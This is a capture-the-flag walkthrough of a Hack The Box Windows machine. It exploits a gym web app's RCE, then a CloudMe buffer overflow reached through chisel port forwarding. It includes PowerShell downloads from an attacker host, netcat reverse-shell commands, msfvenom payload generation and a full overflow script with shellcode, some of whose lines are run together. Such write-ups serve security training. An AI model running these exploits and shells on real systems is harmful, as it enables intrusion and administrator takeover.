Buff is a Windows box with easy difficulty that features an open source web application, which can be exploited using a publicly available exploit. Internal enumeration discovers a program service that is bound to the loopback interface. The program is found to be vulnerable to a buffer overflow attack, and there is also a publicly available exploit to exploit it to gain access as Administrator. Because it is bound to the loopback interface, hence a setup for port forwarding is required before sending the exploit.
Reconnaissance
Nmap
An initial scan with nmap
only discovers one port open on 8080 running an Apache web server.
mkdir nmap; nmap -sC -sV -oN nmap/initial-buff -v 10.10.10.198
Enumeration
TCP 8080 — Website
Visiting port 8080 displays a website for a Gym, on the title it is called “mrb3n’s Bro Hut”.
Clicking on the contact page discovers the name of the software behind this web application, “Gym Management System 1.0”
:: Searchsploit
I can feed the software name to searchsploit
. It shows several exploits, and one that stands out is the remote code execution.
searchsploit Gym Management System 1.0
Foothold
Gym Management System 1.0 RCE
I can mirror/make a copy of the “Gym Management System 1.0 - Unauthenticated Remote Code Execution” exploit code to the current working directory using searchsploit -m 48506
.
I’ll rename 48506.py
to exploit.py
, and run it afterwards.
→ root@kali «exploit» «10.10.14.18»
$ python exploit.py http://10.10.10.198:8080/
With current pseudo shell access, I can’t change my directory but I can still grab the user flag.
C:\xampp\htdocs\gym\upload> type \users\shaun\desktop\user.txt
Upgrade to Interactive Shell
To make the shell a bit more comfy, I uploaded a netcat
using powershell
to Buff, and then I’ll create another reverse shell session.
First, I’ll host the 64 bit netcat, nc64.exe
.
On Buff, I’ll grab the hosted nc64.exe
using PowerShell.
C:\xampp\htdocs\gym\upload> powershell.exe "invoke-webrequest -uri http://10.10.14.18/nc64.exe -outfile nc.exe"
Now I’ll setup a listener on my Kali, and send a reverse shell from Buff using the downloaded nc.exe
.
C:\xampp\htdocs\gym\upload>.\nc.exe -e cmd.exe 10.10.14.18 9001
I have a “proper” shell now.
Privileges Escalation
Internal Enumeration
After enumerating the Users folder, I noticed a slightly different output when typing the dir
command in shaun
home directory.
In the Download folder, there is an executable file called CloudMe_1112.exe
where 1112 is likely a version number.
Checking on currently running services with netstat
discovers.
netstat -aonp tcp
I can search the program name of that PID using the tasklist
command.
C:\xampp\htdocs\gym\upload> tasklist /FI “PID eq 7352" /v /FO list
So PID 7352 on port 8888 is running CloudMe.exe
.
Because the user name field is showing as N/A, one possible thing is that I don’t have enough privilege to dig for more information about the process because it might be running with a higher privilege (either administrator or a local system).
:: Searchsploit
A quick search about “CloudMe” on searchsploit
pops several buffer overflow exploits.
searchsploit CloudMe
CloudMe Buffer Overflow (48389)
The CloudMe program is currently listening on localhost (bound), so to interact with it, I’ll have to setup a tunnel/port forwarding. For this, I’ll use chisel
(https://github.com/jpillora/chisel/releases).
Example usage of chisel are explained better in this blog: https://0xdf.gitlab.io/2020/08/10/tunneling-with-chisel-and-ssf-update.html#chisel
First, I’ll transfer the Windows version of chisel to Buff via PowerShell.
C:\Users\shaun\Download> powershell.exe "invoke-webrequest -uri http://10.10.14.18/chisel.exe -outfile cs.exe"
Second, I’ll setup a chisel server on my Kali.
chisel server -p 9002
On Buff, I’ll connect as client to my chisel server on Kali.
C:\Users\shaun\Download> .\cs.exe client 10.10.14.18:9002 R:8888:127.0.0.1:8888
This, will forward the traffics that sent from my Kali Linux on port 8888 to Buff’s localhost on port 8888.
Kali localhost:8888<->Kali 10.10.14.18:9002<->Buff localhost:8888
I’ll use this exploit PoC (I’ve renamed it to bofexploit.py
) but I’ll have to modify the payload with my own.
# Exploit Title: CloudMe 1.11.2 - Buffer Overflow (PoC)
# Date: 2020-04-27
# Exploit Author: Andy Bowden
# Vendor Homepage: https://www.cloudme.com/en
# Software Link: https://www.cloudme.com/downloads/CloudMe_1112.exe
# Version: CloudMe 1.11.2
# Tested on: Windows 10 x86
#Instructions:
# Start the CloudMe service and run the script.
import socket
target = "127.0.0.1"
padding1 = b"\x90" * 1052
EIP = b"\xB5\x42\xA8\x68" # 0x68A842B5 -> PUSH ESP, RET
NOPS = b"\x90" * 30
#msfvenom -a x86 -p windows/exec CMD=calc.exe -b '\x00\x0A\x0D' -f python
payload = b"\xba\xad\x1e\x7c\x02\xdb\xcf\xd9\x74\x24\xf4\x5e\x33"
payload += b"\xc9\xb1\x31\x83\xc6\x04\x31\x56\x0f\x03\x56\xa2\xfc"
payload += b"\x89\xfe\x54\x82\x72\xff\xa4\xe3\xfb\x1a\x95\x23\x9f"
payload += b"\x6f\x85\x93\xeb\x22\x29\x5f\xb9\xd6\xba\x2d\x16\xd8"
payload += b"\x0b\x9b\x40\xd7\x8c\xb0\xb1\x76\x0e\xcb\xe5\x58\x2f"
payload += b"\x04\xf8\x99\x68\x79\xf1\xc8\x21\xf5\xa4\xfc\x46\x43"
payload += b"\x75\x76\x14\x45\xfd\x6b\xec\x64\x2c\x3a\x67\x3f\xee"
payload += b"\xbc\xa4\x4b\xa7\xa6\xa9\x76\x71\x5c\x19\x0c\x80\xb4"
payload += b"\x50\xed\x2f\xf9\x5d\x1c\x31\x3d\x59\xff\x44\x37\x9a"
payload += b"\x82\x5e\x8c\xe1\x58\xea\x17\x41\x2a\x4c\xfc\x70\xff"
payload += b"\x0b\x77\x7e\xb4\x58\xdf\x62\x4b\x8c\x6b\x9e\xc0\x33"
payload += b"\xbc\x17\x92\x17\x18\x7c\x40\x39\x39\xd8\x27\x46\x59"
payload += b"\x83\x98\xe2\x11\x29\xcc\x9e\x7b\x27\x13\x2c\x06\x05"
payload += b"\x13\x2e\x09\x39\x7c\x1f\x82\xd6\xfb\xa0\x41\x93\xf4"
payload += b"\xea\xc8\xb5\x9c\xb2\x98\x84\xc0\x44\x77\xca\xfc\xc6"
payload += b"\x72\xb2\xfa\xd7\xf6\xb7\x47\x50\xea\xc5\xd8\x35\x0c"
payload += b"\x7a\xd8\x1f\x6f\x1d\x4a\xc3\x5e\xb8\xea\x66\x9f"
overrun = b"C" * (1500 - len(padding1 + NOPS + EIP + payload))
buf = padding1 + EIP + NOPS + payload + overrun
try:
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target,8888))
s.send(buf)
except Exception as e:
print(sys.exc_value)
To generate new payload, I’ll follow the instruction on the PoC code which is using msfvenom
. But, instead of running calc.exe
, I’ll change it to execute the netcat I’ve uploaded before (during upgrading the shaun
shell)
msfvenom -p windows/exec CMD='C:\xampp\htdocs\gym\upload\nc.exe -e cmd.exe 10.10.14.18 9005' -b '\x00\x0A\x0D' -f python -v payload
After removed the comments and changed the payload, the bofexploit.py
now look like this:
import sockettarget = "127.0.0.1"
padding1 = b"\x90" * 1052
EIP = b"\xB5\x42\xA8\x68" # 0x68A842B5 -> PUSH ESP, RET
NOPS = b"\x90" * 30payload += b"\xbe\xd0\xe7\xa9\x73\xd9\xc7\xd9\x74\x24\xf4\x5f"
payload += b"\x31\xc9\xb1\x3e\x31\x77\x12\x03\x77\x12\x83\x17"
payload += b"\xe3\x4b\x86\x6b\x04\x09\x69\x93\xd5\x6e\xe3\x76"
payload += b"\xe4\xae\x97\xf3\x57\x1f\xd3\x51\x54\xd4\xb1\x41"
payload += b"\xef\x98\x1d\x66\x58\x16\x78\x49\x59\x0b\xb8\xc8"
payload += b"\xd9\x56\xed\x2a\xe3\x98\xe0\x2b\x24\xc4\x09\x79"
payload += b"\xfd\x82\xbc\x6d\x8a\xdf\x7c\x06\xc0\xce\x04\xfb"
payload += b"\x91\xf1\x25\xaa\xaa\xab\xe5\x4d\x7e\xc0\xaf\x55"
payload += b"\x63\xed\x66\xee\x57\x99\x78\x26\xa6\x62\xd6\x07"
payload += b"\x06\x91\x26\x40\xa1\x4a\x5d\xb8\xd1\xf7\x66\x7f"
payload += b"\xab\x23\xe2\x9b\x0b\xa7\x54\x47\xad\x64\x02\x0c"
payload += b"\xa1\xc1\x40\x4a\xa6\xd4\x85\xe1\xd2\x5d\x28\x25"
payload += b"\x53\x25\x0f\xe1\x3f\xfd\x2e\xb0\xe5\x50\x4e\xa2"
payload += b"\x45\x0c\xea\xa9\x68\x59\x87\xf0\xe6\x9c\x15\x8f"
payload += b"\x45\x9e\x25\x8f\xf9\xf7\x14\x04\x96\x80\xa8\xcf"
payload += b"\xd2\x7f\xe3\x4d\x72\xe8\xaa\x04\xc6\x75\x4d\xf3"
payload += b"\x05\x80\xce\xf1\xf5\x77\xce\x70\xf3\x3c\x48\x69"
payload += b"\x89\x2d\x3d\x8d\x3e\x4d\x14\xce\xfa\xed\xe2\xa3"
payload += b"\x9f\x7f\x7e\x1f\x13\xe8\xe1\xea\xbd\xb4\x85\x7b"
payload += b"\x35\x2b\x2a\xec\xd8\xd7\xc1\xae\x74\x7b\x08\x2b"
payload += b"\xf1\x1e\x74\x9e\x64\xc1\x17\x8d\x02\x2f\xbd\x35"
payload += b"\xae\x0f\x0c\xf5\x1e\x61\x5e\xdb\x6f\xb5\xb0\x16"
payload += b"\xa4\x95\xf5\x68\xf4\xe0\x05"overrun = b"C" * (1500 — len(padding1 + NOPS + EIP + payload))
buf = padding1 + EIP + NOPS + payload + overruntry:
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target,8888))
s.send(buf)
except Exception as e:
print(sys.exc_value)
The exploit is ready, and now I’ll setup a listener on the same port with the one I’ve assigned to the payload and run the exploit afterwards.
→ root@kali «buff» «10.10.14.18»
$ python2 bofexploit.py
On my listener:
Now I can grab the root flag or dump the hashes.